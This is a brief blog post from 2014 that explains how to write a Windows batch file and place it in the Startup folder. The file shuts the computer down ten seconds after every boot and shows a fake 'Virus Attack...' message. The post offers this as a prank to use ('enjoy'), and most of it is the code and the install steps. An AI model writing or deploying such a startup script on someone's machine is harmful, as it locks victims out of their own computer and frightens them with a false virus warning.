Pages

Saturday 15 February 2014

batch file which will Shutdown the computer everytime on startup!!!!!

Follow these steps:
1)Open notepad
2) type code:

@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit

3) save file as filename.bat
4) GOTO  start=> All program=> right click on startup=> open 
5) paste the batch file in this folder
    
That's all , now the computer will automatically shutdown on every startup..
enjoy..:) 

0 comments:

Post a Comment